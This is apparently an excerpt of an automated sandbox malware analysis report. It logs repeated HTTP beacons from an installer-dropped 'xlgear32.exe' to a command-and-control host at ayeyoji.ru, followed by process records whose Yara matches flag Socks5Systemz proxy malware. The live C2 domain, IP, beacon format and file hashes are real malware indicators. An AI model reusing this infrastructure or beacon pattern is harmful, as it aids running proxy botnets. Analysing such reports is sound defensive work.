19 | 192.168.2.4 | 49833 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:30.713514090 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:32.109592915 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Nov 30, 2024 02:34:32.217515945 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:32.691086054 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49839 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:32.932424068 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:34.309799910 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:34:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49844 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:34.631422043 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:35.942440033 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49849 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:36.181797981 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:37.661833048 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49853 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:37.905771017 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:39.304721117 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49858 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:39.541003942 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:40.919466972 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Nov 30, 2024 02:34:41.030101061 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:41.502412081 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:41 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49864 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:41.744410038 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:43.116338015 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49869 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:43.353902102 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:44.735771894 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49873 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:44.962877989 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:46.404664040 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49878 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:46.642376900 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:48.037117958 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49883 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:48.275427103 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:49.693346024 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49888 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:49.931793928 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:51.306162119 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49891 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:51.609775066 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:53.020618916 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49896 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:53.260059118 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:54.635322094 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49901 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:54.876821995 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:56.331507921 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49905 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:56.577852964 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:57.905153990 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49910 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:58.136842012 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:34:59.511039972 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:34:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49915 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:34:59.749279976 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:35:01.180387020 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:35:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID:37
Source IP:192.168.2.4
Source Port:49920
Destination IP:185.208.158.202
Destination Port:80
PID:3320
Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe

Timestamp:Nov 30, 2024 02:35:01.428373098 CET
Bytes transferred:325
Direction:OUT
Data:
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp:Nov 30, 2024 02:35:02.800364017 CET
Bytes transferred:220
Direction:IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:35:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID:38
Source IP:192.168.2.4
Source Port:49923
Destination IP:185.208.158.202
Destination Port:80
PID:3320
Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe

Timestamp:Nov 30, 2024 02:35:03.045042992 CET
Bytes transferred:325
Direction:OUT
Data:
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
Host: ayeyoji.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp:Nov 30, 2024 02:35:04.463563919 CET
Bytes transferred:220
Direction:IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 30 Nov 2024 01:35:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


                                                                        Target ID:0
                                                                        Start time:20:32:55
                                                                        Start date:29/11/2024
                                                                        Path:C:\Users\user\Desktop\getlab.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\getlab.exe"
                                                                        Imagebase:0x400000
                                                                        File size:3'599'599 bytes
                                                                        MD5 hash:15BD54ED3324A464C1DEB1A883E7649E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:1
                                                                        Start time:20:32:55
                                                                        Start date:29/11/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp" /SL5="$1043E,3351432,54272,C:\Users\user\Desktop\getlab.exe"
                                                                        Imagebase:0x400000
                                                                        File size:704'000 bytes
                                                                        MD5 hash:A0CFF52B882184452424B6E618FA061B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2936760839.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:2
                                                                        Start time:20:32:56
                                                                        Start date:29/11/2024
                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\net.exe" pause xl_gear_11293
                                                                        Imagebase:0xbb0000
                                                                        File size:47'104 bytes
                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:20:32:56
                                                                        Start date:29/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:20:32:57
                                                                        Start date:29/11/2024
                                                                        Path:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe" -i
                                                                        Imagebase:0x400000
                                                                        File size:3'397'185 bytes
                                                                        MD5 hash:9DC53D054BB2482253850DA5D8DFF405
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.2937019748.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.1688736742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:5
                                                                        Start time:20:32:57
                                                                        Start date:29/11/2024
                                                                        Path:C:\Windows\SysWOW64\net1.exe
